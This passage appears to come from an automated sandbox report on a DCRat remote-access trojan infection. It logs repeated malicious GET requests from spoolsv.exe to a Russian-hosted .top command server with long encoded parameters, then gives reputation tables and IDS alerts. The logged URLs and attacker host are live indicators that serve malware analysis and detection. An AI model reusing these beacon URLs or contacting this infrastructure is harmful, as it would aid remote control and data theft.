YzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiIxgzNyEGZ4MDMygzYmhDMhNTYiRTOlBzYmNjMmZjY0QzN0UWZ3kzMxIiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W | RU | text | 104 b | malicious |
2292 | spoolsv.exe | GET | 200 | 94.142.138.11:80 | http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiIxgzNyEGZ4MDMygzYmhDMhNTYiRTOlBzYmNjMmZjY0QzN0UWZ3kzMxIiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W | RU | text | 104 b | malicious |
2292 | spoolsv.exe | GET | 200 | 94.142.138.11:80 | http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI5ETNhNGZjBzY0E2Y2QWYwIWM0EDZ0EDM2MWY0MWZwEGNjZTYlNGZjJiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W | RU | text | 2.13 Kb | malicious |
2292 | spoolsv.exe | GET | 200 | 94.142.138.11:80 | http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiIxgzNyEGZ4MDMygzYmhDMhNTYiRTOlBzYmNjMmZjY0QzN0UWZ3kzMxIiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W | RU | text | 104 b | malicious |
2292 | spoolsv.exe | GET | 200 | 94.142.138.11:80 | http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiIxgzNyEGZ4MDMygzYmhDMhNTYiRTOlBzYmNjMmZjY0QzN0UWZ3kzMxIiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W | RU | text | 104 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2292 | spoolsv.exe | 94.142.138.11:80 | 686084.clmonth.nyashteam.top | Network Management Ltd | RU | malicious |
— | — | 94.142.138.11:80 | 686084.clmonth.nyashteam.top | Network Management Ltd | RU | malicious |
Domain | IP | Reputation |
---|---|---|
686084.clmonth.nyashteam.top |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
2292 | spoolsv.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
2292 | spoolsv.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
2292 | spoolsv.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
2292 | spoolsv.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
2292 | spoolsv.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |